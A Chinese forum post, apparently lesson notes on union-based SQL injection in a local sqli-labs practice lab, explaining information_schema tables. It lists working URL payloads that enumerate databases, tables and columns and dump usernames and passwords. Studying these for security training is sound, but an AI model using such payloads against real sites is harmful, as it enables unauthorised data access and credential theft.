发帖
 找回密码
 立即注册
搜索
0 0

分享 [第十二课]MySQL 重要库表学习

技术分享 973 0 2025-4-12 00:16:20
联合查询
union 将左右两个语句进行拼接,但是两者的数量要相同,否则会报错
SELECT * FROM users where id=1 union select 1,2,3;
在条件不成立时,会只返回 1,2,3

查表
SELECT * FROM users WHERE id=-3 and `user`="xiaoqian" union select group_concat(table_name),DATABASE(),3 from information_schema.tables where table_schema = "yijing";
查列
SELECT * FROM users WHERE id=-3 and `user`="xiaoqian" union select group_concat(column_name),DATABASE(),3 from information_schema.columns where table_schema = "yijing" and table_name = "users";
查数据
select id,pass,`user` from users;联合查询流程注入流程
找到注入点
在找到注入点后判断注入类型
随后判断列数
http://www.sqli.test/Less-1/?id=1' order by 3 --+

http://www.sqli.test/Less-1/?id=-1' union select 1,2,3 --+
判断回显点

查表查版本
http://www.sqli.test/Less-1/?id=-1' union select 1,database(),version() --+
http://www.sqli.test/Less-1/?id=-1' union select 1,database(),schema_name from information_schema.schemata limit 2,3 --+

查表
http://www.sqli.test/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+
查列
http://www.sqli.test/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users' --+

查数据
http://www.sqli.test/Less-1/?id=-1' union select 1,2,group_concat(id,'-',username,'-',password) from users --+

MySql重要库表
1. information_schema数据库简介
这个数据库里面存放了所有数据的库名、表名、字段名、权限等等信息
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。
2.Information_schema数据库表说明
1、SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。2、TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。3、COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。4、STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。5、USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。6、SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。7、TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。8、COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。9、CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。10、COLLATIONS表:提供了关于各字符集的对照信息。11、COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。12、TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。13、KEY_COLUMN_USAGE表:描述了具有约束的键列。14、ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。15、VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。16、TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表
3.Information_schema数据库使用
对于Information_schema数据库重点需要了解schemate,tables,columns这三张表。1、查看schemata 这张表的schema_name 这一个字段 存储整个mysql的库
2、查询数据库版本Select version();                       
3、取库名Select  schema_name from information_schema.schemata;                这个命令就和show databases;一样
4、查看tables这表的table_name字段  存储的是  每一个库的表的名称
5、取表名Select table_name form information_schema.tables where table_schema='库名';
6、查看columns 这个表  column_name 这个字段  存储的是整个库的表的所有字段
7、取字段Select column_name form information_schema.columns where table_schema='库名' and table_name='表名';


作业
一、 常用的sql函数有哪些?
database、limit、verison、update。。
二、 information_schema数据库里面重点应该关注哪些数据表?

informtaion_schema.schemata
information_schema.tables
information_schema.columns

三、 通过information_schema查询库名、表名、以及自己创建的数据表的字段名和具体数据
SELECT table_name from information_schema.tables where table_schema = DATABASE();
select column_name from information_schema.columns where table_schema=DATABASE() and TABLE_name = 'users';
select id,pass,user from users;


──── 0人觉得很赞 ────
免责声明:
1、本论坛中所有用户发布的内容仅代表作者个人观点,与本网站立场无关,本站不对其真实性、完整性或观点承担任何责任。
2、本论坛所提供的全部信息与内容,不保证其准确性、完整性或时效性。因阅读或使用本站内容而产生的任何误导、损失或风险,本站概不承担任何连带或法律责任。
3、当国家司法、行政机关依照法定程序要求本论坛披露用户信息时,本站予以配合并因此免责。
4、因网络线路故障、技术问题、不可抗力或本站无法控制的其他原因导致的服务中断或暂停,本站不承担由此造成的任何直接或间接损失。
5、对于任何通过技术手段破坏、攻击本论坛系统或扰乱正常秩序的行为,本站有权采取包括但不限于限制账号、封禁账号、追究法律责任等措施。
您需要登录后才可以回帖 立即登录
高级模式
返回